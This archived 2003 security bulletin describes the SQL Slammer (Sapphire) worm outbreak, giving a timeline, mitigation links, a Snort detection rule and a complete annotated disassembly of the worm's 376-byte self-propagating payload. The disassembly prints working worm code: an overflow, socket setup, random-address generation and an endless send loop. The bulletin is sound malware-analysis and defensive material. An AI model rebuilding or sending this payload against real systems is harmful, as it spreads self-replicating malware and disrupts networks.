Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Malware :: 1434prb.txt

Another Annotated Disassembly of the Sapphire worm





The word is that a quick fix is to firewall port 1434/UDP traffic, and
reboot the affected SQL servers.

A suggested name for this outbreak is "Bill's Tapeworm".

Last updated 2003-1-25 19:22 CST

----------------------------------------------------
Starting at 11:30pm CST, Jan 24 2003, systems from all over the
internet began sending traffic (apparently) to random destinations. At
5:30am CST, traffic rates are dropping as backbone operators and ISPs
filter UDP traffic to port 1434 (MS-SQL Monitor).

@6:30am CST, traffic at my site is down to a trickle (relatively
speaking), and CNN has heard about the worm:
    http://www.cnn.com/2003/TECH/internet/01/25/internet.attack.ap/index.html

if this is affecting your servers; this might be a good url to check:
    http://support.microsoft.com/default.aspx?scid=kb;EN-US;290211
...or:
    http://www.postgresql.org/

...more info:
    http://www.eeye.com/html/Research/Flash/AL20030125.html
    http://www.securiteam.com/windowsntfocus/5TP0N1F7PS.html 
...and...
    http://www.kb.cert.org/vuls/id/370308

----------------------------------------------------
Suggested Snort rule to cover this worm (broken with \):

alert udp $EXTERNAL_NET any -> $HOME_NET 1434 \ 
(msg:"W32.SQLEXP.Worm propagation"; \ 
content:"|68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E|"; \
content:"|04|"; offset:0; depth:1; reference:cve,CAN-2002-0649; \
reference:cve,CAN-2002-0650; classtype:attempted-user; \
sid:20001; rev:1;)

----------------------------------------------------
A slashdot poster pointed out my error in including portions of the IP
and UDP headers in this dump; the actual data that gets delivered to a
listening socket begins at byte 0x1c (28 decimal) in the following
dump, and *is* 0x04, meaning that this is taking advantage of an old,
known vulnerability. Earlier versions of this file reflected my own
confusion on that point, and I apologize for spreading that
confusion.

----------------------------------------------------
A better disassembly than what follows may be found at:
    http://www.boredom.org/~cstone/worm-annotated.txt

Actual overflow code begins @ 0x91
Disassembly of the 404 (376 less headers)  bytes being sent by affected systems:
----------------------------------------------------

   0:	45                   	inc    %ebp
   1:	00 01                	add    %al,(%ecx)
   3:	94                   	xchg   %eax,%esp
   4:	88 96 00 00 6e 11    	mov    %dl,0x116e0000(%esi)
   a:	b2 f0                	mov    $0xf0,%dl
   c:	0c 11                	or     $0x11,%al
   e:	03 04 d1             	add    (%ecx,%edx,8),%eax
  11:	ad                   	lods   %ds:(%esi),%eax
  12:	2f                   	das    
  13:	10 07                	adc    %al,(%edi)
  15:	f8                   	clc    
  16:	05 9a 01 80 1d       	add    $0x1d80019a,%eax
  1b:	81 04 01 01 01 01 01 	addl   $0x1010101,(%ecx,%eax,1)
  22:	01 01                	add    %eax,(%ecx)
  24:	01 01                	add    %eax,(%ecx)
  26:	01 01                	add    %eax,(%ecx)
  28:	01 01                	add    %eax,(%ecx)
  2a:	01 01                	add    %eax,(%ecx)
  2c:	01 01                	add    %eax,(%ecx)
  2e:	01 01                	add    %eax,(%ecx)
  30:	01 01                	add    %eax,(%ecx)
  32:	01 01                	add    %eax,(%ecx)
  34:	01 01                	add    %eax,(%ecx)
  36:	01 01                	add    %eax,(%ecx)
  38:	01 01                	add    %eax,(%ecx)
  3a:	01 01                	add    %eax,(%ecx)
  3c:	01 01                	add    %eax,(%ecx)
  3e:	01 01                	add    %eax,(%ecx)
  40:	01 01                	add    %eax,(%ecx)
  42:	01 01                	add    %eax,(%ecx)
  44:	01 01                	add    %eax,(%ecx)
  46:	01 01                	add    %eax,(%ecx)
  48:	01 01                	add    %eax,(%ecx)
  4a:	01 01                	add    %eax,(%ecx)
  4c:	01 01                	add    %eax,(%ecx)
  4e:	01 01                	add    %eax,(%ecx)
  50:	01 01                	add    %eax,(%ecx)
  52:	01 01                	add    %eax,(%ecx)
  54:	01 01                	add    %eax,(%ecx)
  56:	01 01                	add    %eax,(%ecx)
  58:	01 01                	add    %eax,(%ecx)
  5a:	01 01                	add    %eax,(%ecx)
  5c:	01 01                	add    %eax,(%ecx)
  5e:	01 01                	add    %eax,(%ecx)
  60:	01 01                	add    %eax,(%ecx)
  62:	01 01                	add    %eax,(%ecx)
  64:	01 01                	add    %eax,(%ecx)
  66:	01 01                	add    %eax,(%ecx)
  68:	01 01                	add    %eax,(%ecx)
  6a:	01 01                	add    %eax,(%ecx)
  6c:	01 01                	add    %eax,(%ecx)
  6e:	01 01                	add    %eax,(%ecx)
  70:	01 01                	add    %eax,(%ecx)
  72:	01 01                	add    %eax,(%ecx)
  74:	01 01                	add    %eax,(%ecx)
  76:	01 01                	add    %eax,(%ecx)
  78:	01 01                	add    %eax,(%ecx)
  7a:	01 01                	add    %eax,(%ecx)
  7c:	01 dc                	add    %ebx,%esp
  7e:	c9                   	leave  
  7f:	b0 42                	mov    $0x42,%al
  81:	eb 0e                	jmp    0x91
  83:	01 01                	add    %eax,(%ecx)
  85:	01 01                	add    %eax,(%ecx)
  87:	01 01                	add    %eax,(%ecx)
  89:	01 70 ae             	add    %esi,0xffffffae(%eax)
  8c:	42                   	inc    %edx
  8d:	01 70 ae             	add    %esi,0xffffffae(%eax)
  90:	42                   	inc    %edx
  91:	90                   	nop    
  92:	90                   	nop    
  93:	90                   	nop    
  94:	90                   	nop    
  95:	90                   	nop    
  96:	90                   	nop    
  97:	90                   	nop    
  98:	90                   	nop    
  99:	68 dc c9 b0 42       	push   $0x42b0c9dc
  9e:	b8 01 01 01 01       	mov    $0x1010101,%eax
  a3:	31 c9                	xor    %ecx,%ecx
  a5:	b1 18                	mov    $0x18,%cl
  a7:	50                   	push   %eax
  a8:	e2 fd                	loop   0xa7
  aa:	35 01 01 01 05       	xor    $0x5010101,%eax
  af:	50                   	push   %eax
  b0:	89 e5                	mov    %esp,%ebp
  b2:	51                   	push   %ecx
  b3:	68 2e 64 6c 6c       	push   $0x6c6c642e
  b8:	68 65 6c 33 32       	push   $0x32336c65
  bd:	68 6b 65 72 6e       	push   $0x6e72656b
  c2:	51                   	push   %ecx
  c3:	68 6f 75 6e 74       	push   $0x746e756f
  c8:	68 69 63 6b 43       	push   $0x436b6369
  cd:	68 47 65 74 54       	push   $0x54746547
  d2:	66 b9 6c 6c          	mov    $0x6c6c,%cx
  d6:	51                   	push   %ecx
  d7:	68 33 32 2e 64       	push   $0x642e3233
  dc:	68 77 73 32 5f       	push   $0x5f327377
  e1:	66 b9 65 74          	mov    $0x7465,%cx
  e5:	51                   	push   %ecx
  e6:	68 73 6f 63 6b       	push   $0x6b636f73
  eb:	66 b9 74 6f          	mov    $0x6f74,%cx
  ef:	51                   	push   %ecx
  f0:	68 73 65 6e 64       	push   $0x646e6573
  f5:	be 18 10 ae 42       	mov    $0x42ae1018,%esi
  fa:	8d 45 d4             	lea    0xffffffd4(%ebp),%eax
  fd:	50                   	push   %eax
  fe:	ff 16                	call   *(%esi)
 100:	50                   	push   %eax
 101:	8d 45 e0             	lea    0xffffffe0(%ebp),%eax
 104:	50                   	push   %eax
 105:	8d 45 f0             	lea    0xfffffff0(%ebp),%eax
 108:	50                   	push   %eax
 109:	ff 16                	call   *(%esi)
 10b:	50                   	push   %eax
 10c:	be 10 10 ae 42       	mov    $0x42ae1010,%esi
 111:	8b 1e                	mov    (%esi),%ebx
 113:	8b 03                	mov    (%ebx),%eax
 115:	3d 55 8b ec 51       	cmp    $0x51ec8b55,%eax
 11a:	74 05                	je     0x121
 11c:	be 1c 10 ae 42       	mov    $0x42ae101c,%esi
 121:	ff 16                	call   *(%esi)
 123:	ff d0                	call   *%eax
 125:	31 c9                	xor    %ecx,%ecx
 127:	51                   	push   %ecx
 128:	51                   	push   %ecx
 129:	50                   	push   %eax
 12a:	81 f1 03 01 04 9b    	xor    $0x9b040103,%ecx
 130:	81 f1 01 01 01 01    	xor    $0x1010101,%ecx
 136:	51                   	push   %ecx
 137:	8d 45 cc             	lea    0xffffffcc(%ebp),%eax
 13a:	50                   	push   %eax
 13b:	8b 45 c0             	mov    0xffffffc0(%ebp),%eax
 13e:	50                   	push   %eax
 13f:	ff 16                	call   *(%esi)
 141:	6a 11                	push   $0x11
 143:	6a 02                	push   $0x2
 145:	6a 02                	push   $0x2
 147:	ff d0                	call   *%eax
 149:	50                   	push   %eax
 14a:	8d 45 c4             	lea    0xffffffc4(%ebp),%eax
 14d:	50                   	push   %eax
 14e:	8b 45 c0             	mov    0xffffffc0(%ebp),%eax
 151:	50                   	push   %eax
 152:	ff 16                	call   *(%esi)
 154:	89 c6                	mov    %eax,%esi
 156:	09 db                	or     %ebx,%ebx
 158:	81 f3 3c 61 d9 ff    	xor    $0xffd9613c,%ebx
 15e:	8b 45 b4             	mov    0xffffffb4(%ebp),%eax
 161:	8d 0c 40             	lea    (%eax,%eax,2),%ecx
 164:	8d 14 88             	lea    (%eax,%ecx,4),%edx
 167:	c1 e2 04             	shl    $0x4,%edx
 16a:	01 c2                	add    %eax,%edx
 16c:	c1 e2 08             	shl    $0x8,%edx
 16f:	29 c2                	sub    %eax,%edx
 171:	8d 04 90             	lea    (%eax,%edx,4),%eax
 174:	01 d8                	add    %ebx,%eax
 176:	89 45 b4             	mov    %eax,0xffffffb4(%ebp)
 179:	6a 10                	push   $0x10
 17b:	8d 45 b0             	lea    0xffffffb0(%ebp),%eax
 17e:	50                   	push   %eax
 17f:	31 c9                	xor    %ecx,%ecx
 181:	51                   	push   %ecx
 182:	66 81 f1 78 01       	xor    $0x178,%cx
 187:	51                   	push   %ecx
 188:	8d 45 03             	lea    0x3(%ebp),%eax
 18b:	50                   	push   %eax
 18c:	8b 45 ac             	mov    0xffffffac(%ebp),%eax
 18f:	50                   	push   %eax
 190:	ff d6                	call   *%esi
 192:	eb ca                	jmp    0x15e


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH